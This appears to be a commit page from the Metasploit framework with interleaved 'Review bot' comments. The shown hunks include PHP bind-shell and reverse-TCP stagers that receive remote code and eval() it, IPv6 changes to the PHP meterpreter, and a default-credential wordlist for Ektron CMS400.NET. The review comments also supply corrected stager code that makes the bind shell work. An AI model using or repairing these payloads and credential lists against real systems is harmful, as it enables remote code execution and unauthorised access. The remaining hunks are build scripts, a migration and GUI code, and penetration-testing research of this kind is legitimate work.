Merge branch 'release/20120131000001' into stable

commit d70596ab44a81652ac4ad92d052f0fbdf6f4ff1d 2 parents 060115e + 77a9b36
Jenkins authored
Showing with 2,603 additions and 585 deletions.
  1. BIN  data/gui/msfgui.jar
  2. BIN  data/meterpreter/ext_server_networkpug.lso
  3. BIN  data/meterpreter/ext_server_sniffer.lso
  4. BIN  data/meterpreter/ext_server_stdapi.lso
  5. +17 −9 data/meterpreter/meterpreter.php
  6. BIN  data/meterpreter/msflinker_linux_x86.bin
  7. +53 −0 data/php/bind_tcp_ipv6.php
  8. +4 −1 data/php/reverse_tcp.php
  9. +32 −10 data/post/enum_artifacts_list.txt
  10. +9 −0 data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb
  11. +14 −0 data/wordlists/cms400net_default_userpass.txt
  12. +12 −0 external/source/gui/msfguijava/src/msfgui/PayloadPopup.java
  13. +3 −3 external/source/gui/msfguijava/src/msfgui/RpcConnection.java
  14. +29 −6 external/source/meterpreter/Makefile
  15. +5 −1 external/source/meterpreter/source/bionic/libc/Android.mk
  16. +1 −1  external/source/meterpreter/source/bionic/libc/Jamfile
  17. +2 −2 external/source/meterpreter/source/bionic/libc/out/x86/make.sh
  18. +1 −1  external/source/meterpreter/source/bionic/libdl/Makefile
  19. +1 −0  external/source/meterpreter/source/bionic/libm/msfMakefile
  20. +2 −2 external/source/meterpreter/source/extensions/stdapi/server/fs/dir.c
  21. +2 −2 external/source/meterpreter/source/extensions/stdapi/server/fs/file.c
  22. +29 −0 external/source/meterpreter/source/extensions/stdapi/server/fs/fs.h
  23. +29 −1 external/source/meterpreter/source/extensions/stdapi/server/fs/fs_util.c
  24. +28 −9 external/source/meterpreter/source/openssl/build.sh
  25. +6 −5 external/source/meterpreter/source/server/rtld/Makefile
  26. +2 −2 external/source/meterpreter/source/server/rtld/elf2bin.c
  27. +4 −4 external/source/meterpreter/source/server/rtld/linker_debug.h
  28. +1 −1  external/source/meterpreter/workspace/Makefile
  29. +1 −1  external/source/meterpreter/workspace/common/Makefile
  30. +1 −1  external/source/meterpreter/workspace/ext_posix_sample/Makefile
  31. +1 −1  external/source/meterpreter/workspace/ext_server_networkpug/Makefile
  32. +1 −1  external/source/meterpreter/workspace/ext_server_sniffer/Makefile
  33. +1 −1  external/source/meterpreter/workspace/ext_server_stdapi/Makefile
  34. +1 −1  external/source/meterpreter/workspace/metsrv/Makefile
  35. +1 −1  lib/msf/core/auxiliary/report.rb
  36. +1 −0  lib/msf/core/db.rb
  37. +2 −1  lib/msf/core/exploit/http/client.rb
  38. +10 −2 lib/msf/core/exploit/http/server.rb
  39. +12 −1 lib/msf/core/exploit/postgres.rb
  40. +4 −0 lib/msf/core/model/host.rb
  41. +12 −0 lib/msf/core/post/common.rb
  42. +16 −4 lib/msf/core/post/file.rb
  43. +5 −0 lib/msf/core/rpc/v10/rpc_module.rb
  44. +21 −10 lib/msf/ui/console/command_dispatcher/core.rb
  45. +1 −1  lib/postgres/postgres-pr/connection.rb
  46. +1 −1  modules/auxiliary/admin/natpmp/natpmp_map.rb
  47. +8 −3 modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb
  48. +59 −54 modules/auxiliary/bnat/bnat_scan.rb
  49. +2 −2 modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb
  50. +1 −1  modules/auxiliary/gather/natpmp_external_address.rb
  51. +108 −10 modules/auxiliary/scanner/discovery/udp_probe.rb
  52. +114 −8 modules/auxiliary/scanner/discovery/udp_sweep.rb
  53. +161 −0 modules/auxiliary/scanner/http/ektron_cms400net.rb
  54. +1 −1  modules/auxiliary/scanner/http/tomcat_enum.rb
  55. +1 −62 modules/auxiliary/scanner/mssql/mssql_hashdump.rb
  56. +2 −48 modules/auxiliary/scanner/mysql/mysql_hashdump.rb
  57. +1 −1  modules/auxiliary/scanner/natpmp/natpmp_portscan.rb
  58. +1 −37 modules/auxiliary/scanner/oracle/oracle_hashdump.rb
  59. +1 −1  modules/auxiliary/scanner/oracle/xdb_sid.rb
  60. +1 −1  modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
  61. +66 −0 modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb
  62. +174 −0 modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb
  63. +1 −1  modules/auxiliary/scanner/postgres/postgres_hashdump.rb
  64. +2 −2 modules/auxiliary/scanner/postgres/postgres_version.rb
  65. +1 −1  modules/auxiliary/scanner/snmp/snmp_login.rb
  66. +7 −1 modules/auxiliary/scanner/vmware/vmauthd_login.rb
  67. +94 −0 modules/auxiliary/scanner/vmware/vmware_http_login.rb
  68. +1 −1  modules/auxiliary/server/tftp.rb
  69. +13 −18 modules/auxiliary/spoof/arp/arp_poisoning.rb
  70. +1 −1  modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
  71. +100 −0 modules/exploits/multi/http/vbseo_proc_deutf.rb
  72. +1 −1  modules/exploits/osx/browser/mozilla_mchannel.rb
  73. +1 −1  modules/exploits/windows/browser/mozilla_mchannel.rb
  74. +469 −0 modules/exploits/windows/browser/ms12_004_midi.rb
  75. +1 −1  modules/exploits/windows/browser/teechart_pro.rb
  76. +3 −3 modules/exploits/windows/browser/vlc_amv.rb
  77. +74 −0 modules/exploits/windows/misc/hp_magentservice.rb
  78. +53 −0 modules/payloads/singles/osx/x64/exec.rb
  79. +61 −0 modules/payloads/singles/php/bind_perl_ipv6.rb
  80. +92 −0 modules/payloads/singles/php/bind_php_ipv6.rb
  81. +0 −1  modules/payloads/singles/php/meterpreter_reverse_tcp.rb
  82. +4 −3 modules/payloads/singles/php/reverse_perl.rb
  83. +13 −5 modules/payloads/singles/php/reverse_php.rb
  84. +54 −0 modules/payloads/stagers/php/bind_tcp_ipv6.rb
  85. +2 −3 modules/post/linux/gather/checkvm.rb
  86. +64 −0 modules/post/multi/gather/enum_vbox.rb
  87. +138 −0 modules/post/multi/gather/find_vmx.rb
  88. +11 −2 modules/post/multi/gather/pidgin_cred.rb
  89. +36 −18 modules/post/windows/gather/checkvm.rb
  90. +1 −1  modules/post/windows/gather/credentials/filezilla_server.rb
  91. +2 −2 modules/post/windows/gather/credentials/imail.rb
  92. +1 −1  modules/post/windows/gather/credentials/imvu.rb
  93. +1 −1  modules/post/windows/gather/credentials/nimbuzz.rb
  94. +3 −2 modules/post/windows/gather/dumplinks.rb
  95. +45 −41 modules/post/windows/gather/enum_artifacts.rb
  96. +2 −2 modules/post/windows/gather/enum_devices.rb
  97. +3 −0  msfvenom
  98. +12 −12 tools/msftidy.rb
  99. +157 −144 tools/reg.rb
BIN  data/gui/msfgui.jar
BIN  data/meterpreter/ext_server_networkpug.lso
BIN  data/meterpreter/ext_server_sniffer.lso
BIN  data/meterpreter/ext_server_stdapi.lso
26 data/meterpreter/meterpreter.php
@@ -730,6 +730,17 @@ function register_stream($stream, $ipaddr=null, $port=null) {
function connect($ipaddr, $port, $proto='tcp') {
my_print("Doing connect($ipaddr, $port)");
$sock = false;
+
+ # IPv6 requires brackets around the address in some cases, but not all.
+ # Keep track of the un-bracketed address for the functions that don't like
+ # brackets, specifically socket_connect and socket_sendto.
+ $ipf = AF_INET;
+ $raw_ip = $ipaddr;
+ if (FALSE !== strpos($ipaddr, ":")) {
+ $ipf = AF_INET6;
+ $ipaddr = "[". $raw_ip ."]";
+ }
+
# Prefer the stream versions so we don't have to use both select functions
# unnecessarily, but fall back to socket_create if they aren't available.
if (is_callable('stream_socket_client')) {
@@ -759,16 +770,17 @@ function connect($ipaddr, $port, $proto='tcp') {
if (!$sock) { return false; }
register_stream($sock, $ipaddr, $port);
}
- } elseif (is_callable('socket_create')) {
+ } else
+ if (is_callable('socket_create')) {
my_print("socket_create");
if ($proto == 'tcp') {
- $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
- $res = socket_connect($sock, $ipaddr, $port);
+ $sock = socket_create($ipf, SOCK_STREAM, SOL_TCP);
+ $res = socket_connect($sock, $raw_ip, $port);
if (!$res) { return false; }
register_socket($sock);
} elseif ($proto == 'udp') {
- $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
- register_socket($sock, $ipaddr, $port);
+ $sock = socket_create($ipf, SOCK_DGRAM, SOL_UDP);
+ register_socket($sock, $raw_ip, $port);
}
}
@@ -1066,10 +1078,6 @@ function remove_reader($resource) {
$ipaddr = '127.0.0.1';
$port = 4444;
my_print("Don't have a msgsock, trying to connect($ipaddr, $port)");
- if (FALSE !== strpos($ipaddr,":")) {
- # ipv6 requires brackets around the address
- $ipaddr = "[".$ipaddr."]";
- }
$msgsock = connect($ipaddr, $port);
if (!$msgsock) { die(); }
} else {
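Review bot: `connect()` now brackets unconditionally, `$ipaddr = "[". $raw_ip ."]";`, so any caller that still hands in an already bracketed literal (as the removed block at the bottom of this page used to do) ends up with `[[::1]]` for the stream path and a `$raw_ip` that still carries the brackets `socket_connect` rejects. Normalising first, `$raw_ip = trim($ipaddr, "[]");` before the `strpos` test, keeps both kinds of caller working. Note also that `register_stream($sock, $ipaddr, $port)` records the bracketed form while the new `register_socket($sock, $raw_ip, $port)` records the raw one; if the stored address is later reused for a sendto on either API that asymmetry deserves a comment next to the new one. The body of `connect()` continues outside these hunks.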
BIN  data/meterpreter/msflinker_linux_x86.bin
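--- /dev/null
+++ b/data/php/bind_tcp_ipv6.php
@@ -0,0 +1,53 @@
+#<?php
+
+# The payload handler overwrites this with the correct LPORT before sending
+# it to the victim.
+$port = 4444;
+$ipaddr = "::";
+
+if (is_callable('stream_socket_server')) {
+ $srvsock = stream_socket_server("tcp://[{$ipaddr}]:{$port}");
+ if (!$srvsock) { die(); }
+ $s = stream_socket_accept($srvsock, -1);
+ $s_type = 'stream';
+} elseif (is_callable('socket_create_listen')) {
+ $srvsock = socket_create_listen(AF_INET6, SOCK_STREAM, SOL_TCP);
+ if (!$res) { die(); }
+ $s = socket_accept($srvsock);
+ $s_type = 'socket';
+} elseif (is_callable('socket_create')) {
+ $srvsock = socket_create(AF_INET6, SOCK_STREAM, SOL_TCP);
+ $res = socket_bind($srvsock, $ipaddr, $port);
+ if (!$res) { die(); }
+ $s = socket_accept($srvsock);
+ $s_type = 'socket';
+} else {
+ die();
+}
+if (!$s) { die(); }
+
+switch ($s_type) {
+case 'stream': $len = fread($s, 4); break;
+case 'socket': $len = socket_read($s, 4); break;
+}
+if (!$len) {
+ # We failed on the main socket. There's no way to continue, so
+ # bail
+ die();
+}
+$a = unpack("Nlen", $len);
+$len = $a['len'];
+
+$b = '';
+while (strlen($b) < $len) {
+ switch ($s_type) {
+ case 'stream': $b .= fread($s, $len-strlen($b)); break;
+ case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
+ }
+}
+
+# Set up the socket for the main stage to use.
+$GLOBALS['msgsock'] = $s;
+$GLOBALS['msgsock_type'] = $s_type;
+eval($b);
+die();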
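Review bot: The `socket_create_listen` branch can never succeed: `$res` is never assigned in it, so `if (!$res) { die(); }` always dies, and PHP's `socket_create_listen()` takes a port and a backlog and listens on the IPv4 wildcard address, not `(AF_INET6, SOCK_STREAM, SOL_TCP)`. The `socket_create` branch under it never calls `socket_listen()` between `socket_bind()` and `socket_accept()`, so accept fails there too, leaving `stream_socket_server` as the only working path. I would drop the middle branch and add the missing listen step as below. Separately, both read loops append the return value of `fread`/`socket_read` without checking for false or an empty read, so a peer that closes mid-stage spins the loop forever; `break` out when a read returns nothing.
```php
// … unchanged: stream_socket_server branch …
} elseif (is_callable('socket_create')) {
    $srvsock = socket_create(AF_INET6, SOCK_STREAM, SOL_TCP);
    if (!$srvsock) { die(); }
    $res = socket_bind($srvsock, $ipaddr, $port);
    if (!$res) { die(); }
    $res = socket_listen($srvsock);
    if (!$res) { die(); }
    $s = socket_accept($srvsock);
    $s_type = 'socket';
} else {
// … unchanged: die() fallthrough, stage length read, eval …
```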
5 data/php/reverse_tcp.php
@@ -5,9 +5,12 @@
# it to the victim.
$ip = '127.0.0.1';
$port = 4444;
+$ipf = AF_INET;
+
if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip = "[". $ip ."]";
+ $ipf = AF_INET6;
}
if (($f = 'stream_socket_client') && is_callable($f)) {
@@ -17,7 +20,7 @@
$s = $f($ip, $port);
$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
- $s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
+ $s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
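Review bot: The `socket_create` fallback still calls `socket_connect($s, $ip, $port)` with the bracketed address, so IPv6 connects fail on that path; the `meterpreter.php` change in this same commit states that `socket_connect` does not accept brackets and keeps an unbracketed copy for exactly this call. Do the same here: `$raw_ip = $ip;` before the `strpos` test and `$res = @socket_connect($s, $raw_ip, $port);` in this branch. The `@` suppression on that call also hides the resulting warning, which is why this fails silently.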
42 data/post/enum_artifacts_list.txt
@@ -1,14 +1,36 @@
-# This file contains a list of artifacts used by the enum_artifacts post module
-# Artifacts should be listed one per line and use the following formats:
-# File entries
-# file|path/to/file|md5sum
+# YAML:1.0
+# Configuration file for enum_artifacts.rb module
+# This file contains a YAML formated list of artifacts used by the
+# enum_artifacts post module. Artifacts should be listed using the following
+# format:
#
-# Registry entries
-# reg|hive|key|value
+# ---
+# malware_name:
+# files:
+# - name: path\to\file
+# csum: 00112233445566778899aabbccddeeff
+# - name: path\to\another\file
+# csum: 112233445566778899aabbccddeeff00
+#
+# reg_entries:
+# - key: registry_key
+# val: registry_value
+# data: data
#
# Happy hunting
+---
+test_evidence:
+ files:
+ - name: c:\ntdetect.comx
+ csum: b2de3452de03674c6cec68b8c8ce7c78
+ - name: c:\boot.ini
+ csum: fa579938b0733b87066546afe951082c
+
+ reg_entries:
+ - key: HKEY_LOCAL_MACHINE\SYSTEM\Selectx
+ val: Current
+ data: 1
+ - key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ACPI
+ val: DisplayName
+ data: Microsoft ACPI Driver
-file|c:\ntdetect.com|b2de3452de03674c6cec68b8c8ce7c78
-file|c:\boot.ini|fa579938b0733b87066546afe951082c
-reg|HKEY_LOCAL_MACHINE\SYSTEM\Select|Current|1
-reg|HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ACPI|DisplayName|Microsoft ACPI Driver
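Review bot: The `test_evidence` sample uses names that read as typos, `c:\ntdetect.comx` and `HKEY_LOCAL_MACHINE\SYSTEM\Selectx`, whereas the removed lines had the real `ntdetect.com` and `Select`; if the trailing `x` is deliberate so that the shipped sample never matches a real host, say so in the header, e.g. `# test_evidence is a deliberately non-matching sample (note the trailing x); replace with real indicators`, otherwise a future maintainer will "fix" it. The header comment also misspells `formatted`.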
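--- /dev/null
+++ b/data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb
@@ -0,0 +1,9 @@
+class AddVirtualHostToHosts < ActiveRecord::Migration
+ def self.up
+ add_column :hosts, :virtual_host, :text
+ end
+
+ def self.down
+ remove_column :hosts, :viritual_host
+ end
+end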
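Review bot: `self.down` removes `:viritual_host`, a misspelling of the column `self.up` adds, so rolling this migration back raises instead of dropping the column; change it to `remove_column :hosts, :virtual_host`.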
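--- /dev/null
+++ b/data/wordlists/cms400net_default_userpass.txt
@@ -0,0 +1,14 @@
+admin admin
+builtin builtin
+jedit jedit
+jmember jmember
+Admin2 Admin2
+tbrown tbrown
+jsmith jsmith
+vs vs
+EkExplorerUser EkExplorerUser
+Explorer Explorer
+member@example.com member@example.com
+north north
+supermember supermember
+west west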
12 external/source/gui/msfguijava/src/msfgui/PayloadPopup.java
@@ -46,6 +46,18 @@ public PayloadPopup(String fullName, RpcConnection rpcConn, MainFrame frame) {
encoderCombo.setSelectedIndex(defaultEncoder);
}catch(MsfException xre){
}
+ //get formats
+ try{
+ Object[] formats = ((List)rpcConn.execute("module.encode_formats")).toArray();
+ int defaultFormat = 0;
+ for(int i = 0; i < formats.length; i++)
+ if(formats[i].toString().equals("exe"))
+ defaultFormat = i;
+ outputCombo.setModel(new DefaultComboBoxModel(formats));
+ outputCombo.setSelectedIndex(defaultFormat);
+ }catch(MsfException xre){
+ xre.printStackTrace();
+ }
mainScrollPane.getVerticalScrollBar().setUnitIncrement(40);
}
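Review bot: The new formats block copies the encoder block above it but handles failure differently: it `printStackTrace()`s to stderr where the encoder block silently ignores the same `MsfException`, so one RPC failure is loud and the other invisible. Pick one behaviour for both; in a GUI a user-visible message is the useful one. Minor: the search loop should `break` once `"exe"` is found, and the unchecked `(List)` cast of the server reply is cleaner as an `instanceof List` test before `toArray()`.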
6 external/source/gui/msfguijava/src/msfgui/RpcConnection.java
@@ -84,7 +84,7 @@ public void setup(String username, char[] password, String host, int port, boole
String message = "";
try {
connect();
- Map results = exec("auth.login",new Object[]{username, this.password});
+ Map results = (Map)exec("auth.login",new Object[]{username, this.password});
rpcToken=results.get("token").toString();
haveRpcd=results.get("result").equals("success");
} catch (MsfException xre) {
@@ -211,11 +211,11 @@ private Object cacheExecute(String methodName, Object[] params) throws MsfExcept
}
/** Method that handles synchronization and error handling for calls */
- private Map exec (String methname, Object[] params) throws MsfException{
+ private Object exec (String methname, Object[] params) throws MsfException{
synchronized(lockObject){ //Only one method call at a time!
try{
writeCall(methname, params);
- return (Map)readResp();
+ return readResp();
}catch(Exception ex){ //any weirdness gets wrapped in a MsfException
try{
if(ex instanceof java.net.SocketTimeoutException)
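Review bot: `setup` now casts the `auth.login` reply, `(Map)exec(...)`, and immediately dereferences `results.get("token").toString()`, so a reply that is not a map or that lacks `token` (the failure case `haveRpcd` is meant to detect) throws `ClassCastException` or `NullPointerException`, which the `catch (MsfException xre)` below does not cover. Check `results.get("result")` first and read `token` only on success, treating anything else as a login failure, instead of inferring the outcome after the dereference. `setup` continues outside the hunk.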
35 external/source/meterpreter/Makefile
@@ -40,11 +40,25 @@ external/source/meterpreter/source/bionic/compiled/libcrypto.so: tmp/openssl-0.9
external/source/meterpreter/source/bionic/compiled/libssl.so: tmp/openssl-0.9.8o/libssl.so
cp tmp/openssl-0.9.8o/libssl.so external/source/meterpreter/source/bionic/compiled/libssl.so
+LIBC=$(PWD)/external/source/meterpreter/source/bionic/libc
+LIBM=$(PWD)/external/source/meterpreter/source/bionic/libm
+COMPILED=$(PWD)/external/source/meterpreter/source/bionic/compiled
+MSF_CFLAGS=-Os -Wl,--hash-style=sysv -march=i386 -m32 -nostdinc -nostdlib -fno-builtin -fpic -I $(LIBC)/include -I $(LIBC)/kernel/common/linux/ -I $(LIBC)/kernel/common/ -I $(LIBC)/arch-x86/include/ -I $(LIBC)/kernel/arch-x86/ -I$(LIBC)/private -I$(LIBM)/include -DPIC -Dwchar_t='char' -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -D_BYTE_ORDER=_LITTLE_ENDIAN -L$(COMPILED) -lc
+
tmp/openssl-0.9.8o/libssl.so:
[ -d tmp ] || mkdir tmp
- [ -d tmp/openssl-0.9.8o ] || wget -O tmp/openssl-0.9.8o.tar.gz http://openssl.org/source/openssl-0.9.8o.tar.gz && tar -C tmp/ -xzf tmp/openssl-0.9.8o.tar.gz
- (cd tmp/openssl-0.9.8o && ./Configure threads no-zlib no-krb5 386 --prefix=/tmp/out linux-elf shared)
- (cd tmp/openssl-0.9.8o && make CC="gcc -Os -Wl,--hash-style=sysv -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -I${PWD}/external/source/meterpreter/source/bionic/libc/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${PWD}/external/source/meterpreter/source/bionic/libm/include -L${PWD}/external/source/meterpreter/source/bionic/compiled -D_BYTE_ORDER=_LITTLE_ENDIAN -lc" depend all ; [ -f libssl.so.0.9.8 -a -f libcrypto.so.0.9.8 ] )
+ [ -d tmp/openssl-0.9.8o ] || wget -O tmp/openssl-0.9.8o.tar.gz http://openssl.org/source/openssl-0.9.8o.tar.gz
+ [ -f tmp/openssl-0.9.8o/Configure ] || tar -C tmp/ -xzf tmp/openssl-0.9.8o.tar.gz
+ (cd tmp/openssl-0.9.8o && \
+ cat Configure | grep -v 'linux-msf' | \
+ sed -e 's#my %table=(#my %table=( \
+ "linux-msf", "gcc:$(MSF_CFLAGS) -DL_ENDIAN -DTERMIO -Wall::$(MSF_CFLAGS) -D_REENTRANT::$(MSF_CFLAGS) -ldl:BN_LLONG $${x86_gcc_des} $${x86_gcc_opts}:$${x86_elf_asm}:dlfcn:linux-shared:$(MSF_CFLAGS) -fPIC::.so.\\$$\\$$(SHLIB_MAJOR).\\$$\\$$(SHLIB_MINOR)",\
+ #;' > Configure-msf;\
+ cp Configure-msf Configure && chmod +x Configure && \
+ grep linux-msf Configure && \
+ ./Configure --prefix=/tmp/out threads shared no-hw no-dlfcn no-zlib no-krb5 no-idea 386 linux-msf \
+ )
+ (cd tmp/openssl-0.9.8o && make CC="gcc -march=i386 -m32 -Os -Wl,--hash-style=sysv -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -I${PWD}/external/source/meterpreter/source/bionic/libc/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${PWD}/external/source/meterpreter/source/bionic/libm/include -L${PWD}/external/source/meterpreter/source/bionic/compiled -D_BYTE_ORDER=_LITTLE_ENDIAN -lc" depend all ; [ -f libssl.so.0.9.8 -a -f libcrypto.so.0.9.8 ] )
cp tmp/openssl-0.9.8o/libssl.so* tmp/openssl-0.9.8o/libcrypto.so* external/source/meterpreter/source/openssl/lib/linux/i386/
external/source/meterpreter/source/bionic/compiled/libpcap.so: tmp/libpcap-1.1.1/libpcap.so.1.1.1
@@ -53,7 +67,7 @@ external/source/meterpreter/source/bionic/compiled/libpcap.so: tmp/libpcap-1.1.1
tmp/libpcap-1.1.1/libpcap.so.1.1.1:
[ -d tmp ] || mkdir tmp
[ -f tmp/libpcap-1.1.1.tar.gz ] || wget -O tmp/libpcap-1.1.1.tar.gz http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
- tar -C tmp -xzf tmp/libpcap-1.1.1.tar.gz
+ [ -f tmp/libpcap-1.1.1/configure ] || tar -C tmp -xzf tmp/libpcap-1.1.1.tar.gz
(cd tmp/libpcap-1.1.1 && ./configure --disable-bluetooth --without-bluetooth --without-usb --disable-usb --without-can --disable-can --without-usb-linux --disable-usb-linux)
echo '#undef HAVE_DECL_ETHER_HOSTTON' >> tmp/libpcap-1.1.1/config.h
echo '#undef HAVE_SYS_BITYPES_H' >> tmp/libpcap-1.1.1/config.h
@@ -63,7 +77,7 @@ tmp/libpcap-1.1.1/libpcap.so.1.1.1:
echo '#define _STDLIB_H this_works_around_malloc_definition_in_grammar_dot_c' >> tmp/libpcap-1.1.1/config.h
(cd tmp/libpcap-1.1.1 && patch --dry-run -p0 < ../../external/source/meterpreter/source/libpcap/pcap_nametoaddr_fix.diff && patch -p0 < ../../external/source/meterpreter/source/libpcap/pcap_nametoaddr_fix.diff)
sed -i -e s/pcap-usb-linux.c//g -e s/fad-getad.c/fad-gifc.c/g tmp/libpcap-1.1.1/Makefile
- sed -i -e s^"CC = gcc"^"CC = gcc -Wl,--hash-style=sysv -fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall -D_UNIX -D__linux__ -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -D_BYTE_ORDER=_LITTLE_ENDIAN -lgcc -L${PWD}/external/source/meterpreter/source/bionic/compiled -gstabs+ -fPIC -Os -lc"^g tmp/libpcap-1.1.1/Makefile
+ sed -i -e s^"CC = gcc"^"CC = gcc -march=i386 -m32 -Wl,--hash-style=sysv -fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall -D_UNIX -D__linux__ -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -D_BYTE_ORDER=_LITTLE_ENDIAN -lgcc -L${PWD}/external/source/meterpreter/source/bionic/compiled -gstabs+ -fPIC -Os -lc"^g tmp/libpcap-1.1.1/Makefile
(cd tmp/libpcap-1.1.1 && make)
@@ -108,10 +122,19 @@ data/meterpreter/ext_server_networkpug.lso: $(workspace)/ext_server_networkpug/e
clean:
rm -f $(objects)
rm -f external/source/meterpreter/source/bionic/lib*/*.o
+ find external/source/meterpreter/source/bionic/ -name '*.a' -print0 | xargs -0 rm -f 2>/dev/null
rm -f external/source/meterpreter/source/bionic/lib*/*.so
(cd external/source/meterpreter/source/server/rtld/ && make clean)
(cd $(workspace) && make clean)
+clean-pcap:
+ (cd tmp/libpcap-1.1.1/ && make clean)
+
+clean-ssl:
+ (cd tmp/openssl-0.9.8o/ && make clean)
+
+really-clean: clean clean-ssl clean-pcap
+
-.PHONY: clean
+.PHONY: clean clean-ssl clean-pcap really-clean
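Review bot: The OpenSSL and libpcap tarballs are fetched over plain `http://` and then compiled and linked into every Linux meterpreter without any integrity check, so whatever the mirror or a network position serves becomes the `libssl.so`/`libcrypto.so` shipped under `data/meterpreter`. Fetch over `https://`, pin the expected SHA-256 of each tarball in the Makefile, and verify it with `sha256sum -c` between the `wget` line and the `[ -f .../Configure ] || tar` line so only a verified archive is ever extracted. The same applies to the libpcap rule below the OpenSSL one.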
6 external/source/meterpreter/source/bionic/libc/Android.mk
@@ -443,7 +443,11 @@ else # !arm
# Enable recent IA friendly memory routines (such as for Atom)
# These will not work on the earlier x86 machines
- libc_common_cflags += -mtune=i686 -DUSE_SSSE3 -DUSE_SSE2
+ #libc_common_cflags += -mtune=i686 -DUSE_SSSE3 -DUSE_SSE2
+
+ # egypt: compile for 386 so meterpreter will have a chance of working on
+ # older processors
+ libc_common_cflags += -march=i386
endif # x86
endif # !arm
2  external/source/meterpreter/source/bionic/libc/Jamfile
@@ -377,7 +377,7 @@ DEFINES = USE_LOCKS
ANDROID
;
-CFLAGS_x86 = -Iprivate -Ibionic -Ikernel/arch-x86 -Ikernel/common -I../libm/include -fno-stack-protector -fno-pie -DPIC -ffreestanding -fno-tree-scev-cprop ;
+CFLAGS_x86 = -m32 -march=i386 -Iprivate -Ibionic -Ikernel/arch-x86 -Ikernel/common -I../libm/include -fno-stack-protector -fno-pie -DPIC -ffreestanding -fno-tree-scev-cprop ;
for arch in $(ARCH)
4 external/source/meterpreter/source/bionic/libc/out/x86/make.sh 100644 → 100755
@@ -11,10 +11,10 @@ for i in $BAD_FILES ; do
rm flood/$i >/dev/null
done
-gcc -Wl,--hash-style=sysv -nostdinc -nostdlib -shared -o libbionic.so flood/*.o -lgcc
+gcc -Wl,--hash-style=sysv -nostdinc -nostdlib -shared -o libbionic.so flood/*.o -lgcc -march=i386 -m32
[ ! -f libc.so ] && ln -s ${PWD}/libbionic.so libc.so
rm -rf flood >/dev/null
-
+exit 0
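Review bot: The trailing `exit 0` hides real build failures: it was evidently added because `[ ! -f libc.so ] && ln -s ...` exits non-zero once `libc.so` already exists, but it also turns a failed `gcc ... -shared -o libbionic.so` into success for whatever calls this script. Rewrite the guard as `[ -f libc.so ] || ln -s ${PWD}/libbionic.so libc.so` and drop the `exit 0`, so the script's status reflects the link step; add `set -e` at the top if it is not already there (the head of the file is outside this hunk).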
2  external/source/meterpreter/source/bionic/libdl/Makefile
@@ -3,7 +3,7 @@ CFLAGS+= -I../libc/include -I../libc/private -I../libc/bionic -I../libc/kernel/a
CFLAGS+= -I../libc/kernel/common/linux/ -I../libc/arch-x86/include/ -I../libc/kernel/common/
CFLAGS+= -Os
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
all:
gcc -Wl,--hash-style=sysv -shared -o libdl.so $(CFLAGS) libdl.c
1  external/source/meterpreter/source/bionic/libm/msfMakefile
@@ -10,6 +10,7 @@ CFLAGS+=-I../libc/kernel/common/ -I../libc/arch-${TARGET_ARCH}/include/ -I../lib
CFLAGS+=-D_BYTE_ORDER=_LITTLE_ENDIAN -Ihack/ -I${TARGET_FPU} -I../libc/arch-${TARGET_ARCH}/include
CFLAGS+=-fPIC -DPIC
CFLAGS+=-Wl,--hash-style=sysv
+CFLAGS+=-march=i386 -m32
libm_common_src_files= \
isinf.c \
4 external/source/meterpreter/source/extensions/stdapi/server/fs/dir.c
@@ -21,7 +21,7 @@ DWORD request_fs_ls(Remote *remote, Packet *packet)
LPSTR expanded = NULL, tempFile = NULL;
DWORD tempFileSize = 0;
